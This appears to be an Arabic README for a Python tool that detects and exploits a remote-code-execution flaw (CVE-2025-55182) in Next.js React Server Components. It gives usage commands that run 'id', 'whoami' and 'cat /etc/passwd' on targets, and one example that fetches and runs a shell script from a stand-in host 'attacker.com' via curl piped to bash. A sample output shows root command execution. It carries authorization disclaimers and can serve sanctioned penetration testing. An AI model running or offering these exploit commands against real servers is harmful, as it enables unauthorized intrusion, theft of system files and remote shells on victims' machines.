
ماسح أمني مبني على بايثون لاكتشاف واستغلال ثغرات **React Server Components (RSC)** في تطبيقات Next.js. تقوم هذه الأداة بالكشف السلبي، وتحديد البصمة النشط، واختبار استغلال RCE.
ماسح أمني مبني على بايثون لاكتشاف واستغلال ثغرات مكونات خادم React (RSC) في تطبيقات Next.js. تقوم هذه الأداة بالكشف السلبي، وتحديد البصمة النشط، واختبار استغلال تنفيذ الأوامر عن بُعد (RCE).
⚠️ تحذير: هذه الأداة مخصصة لاختبارات الأمن المصرح بها فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. احصل دائمًا على إذن كتابي قبل الاختبار.
✅ الكشف السلبي - يحلل HTML والترويسات وبنية الصفحة للبحث عن مؤشرات RSC
✅ تحديد البصمة النشط - يرسل ترويسات خاصة بـ RSC لاكتشاف استجابات الخادم
✅ تحليل ترويسات HTTP - يحدد الترويسات المتعلقة بـ Next.js و RSC
✅ استغلال RCE - ينفذ أوامر على الخوادم الضعيفة (إذا كانت قابلة للاستغلال)
✅ مخرجات طرفية ملونة - تغذية بصرية محسّنة لوضوح أفضل
✅ الوضع التفاعلي - تنفيذ أوامر متعددة في وضع الاستغلال
✅ فك ترميز قوي - يعالج الحمولات المضغوطة بـ gzip والبيانات الثنائية
استنساخ المستودع
git clone https://github.com/mahaveer-choudhary/CVE-2025-55182.git
cd CVE-2025-55182
تثبيت التبعيات
pip install -r requirements.txt
الحزم المطلوبة:
requests>=2.28.0 - مكتبة عميل HTTPurllib3>=1.26.0 - أدوات HTTP متقدمةcolorama>=0.4.6 - ألوان الطرفية (متوافق مع ويندوز)beautifulsoup4 - تحليل HTMLpython rsc_detector.py https://example.com
python rsc_detector.py https://example.com --exploit
python rsc_detector.py https://example.com --exploit --cmd "whoami"
python rsc_detector.py https://example.com --exploit
ثم أدخل الأوامر في الموجه (اكتب quit للخروج).
| الخيار | الوصف |
|---|---|
<URL> | عنوان الهدف (مطلوب). يضيف https:// تلقائيًا إذا كان مفقودًا |
--exploit | تفعيل استغلال RCE بعد الكشف |
--cmd <command> | تنفيذ أمر محدد (يُستخدم مع --exploit) |
اكتشاف ثغرة RSC:
python rsc_detector.py https://target.com
استغلال وتنفيذ أمر id:
python rsc_detector.py https://target.com --exploit --cmd "id"
استغلال وتنفيذ cat /etc/passwd:
python rsc_detector.py https://target.com --exploit --cmd "cat /etc/passwd"
الوضع التفاعلي (أوامر متعددة):
python rsc_detector.py https://target.com --exploit
window.__next_f (موجه تطبيقات Next.js)text/x-component__NEXT_DATA__ وعمليات الاستيراد في Next.jsServer و Vary و X-Nextjs-CacheRSC: 1[*] Starting RSC Detection Scan on: https://example.com
====================================================================
[1] Running Passive Scan...
Status: DETECTED
Score: 80/100
- Found: window.__next_f (App Router)
[2] Analyzing Headers...
- Vary header includes RSC: ...
[3] Running Active Fingerprint...
Status: DETECTED
- Response Content-Type became text/x-component
- Vary header contains 'RSC'
====================================================================
[FINAL RESULT] VULNERABLE
[!] This application appears to be vulnerable to RSC-based attacks!
Consider: RCE exploitation may be possible
[*] Executing command: whoami
[+] Command executed successfully!
[OUTPUT]
root
تستغل CVE-2025-55182:
child_process.execSync()هذه الأداة مخصصة حصريًا لاختبارات الأمن المصرح بها فقط:
الوصول غير المصرح به إلى أجهزة الكمبيوتر غير قانوني بموجب:
إذا اكتشفت ثغرة باستخدام هذه الأداة:
تتجاهل الأداة التحقق من SSL افتراضيًا. لتمكين التحقق:
detector = RSCDetector(url, verify_ssl=True)
تقوم الأداة تلقائيًا بـ:
قم بزيادة المهلة الزمنية في الكود:
response = self.session.get(self.url, timeout=30) # 30 seconds
CVE-2025-55182/
├── README.md # This file
├── requirements.txt # Python dependencies
├── rsc_detector.py # Main scanner & exploit engine
├── rsc_cli.py # CLI utilities (if present)
├── script.py # Additional scripts (if present)
├── COLOR_GUIDE.md # Color output documentation
└── .gitignore # Git ignore rules
requests>=2.28.0 # HTTP requests
urllib3>=1.26.0 # Advanced HTTP
beautifulsoup4>=4.11.0 # HTML parsing
colorama>=0.4.6 # Terminal colors (Windows)
ثبّت الكل دفعة واحدة:
pip install -r requirements.txt
--exploit إذا كنت تفحص فقطpython rsc_detector.py https://target.com --exploit --cmd "curl attacker.com/shell | bash"
python rsc_detector.py https://target.com > scan_results.txt 2>&1
for url in https://site1.com https://site2.com; do
python rsc_detector.py "$url"
done
وجدت خطأ أو لديك تحسين؟ المساهمات مرحب بها!
git checkout -b feature/improvement)git commit -am 'Add feature')git push origin feature/improvement)THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND.
THE AUTHORS ASSUME NO LIABILITY FOR MISUSE OR UNAUTHORIZED ACCESS.
USE AT YOUR OWN RISK AND ONLY WITH PROPER AUTHORIZATION.
هذا المشروع مقدم لأغراض تعليمية واختبارات الأمن المصرح بها فقط.
أُنشئ لأغراض البحث الأمني واختبارات الاختراق المصرح بها.
آخر تحديث: 19 ديسمبر 2025
تذكر: القوة العظيمة تأتي مع مسؤولية عظيمة. استخدم هذه الأداة بشكل أخلاقي وقانوني.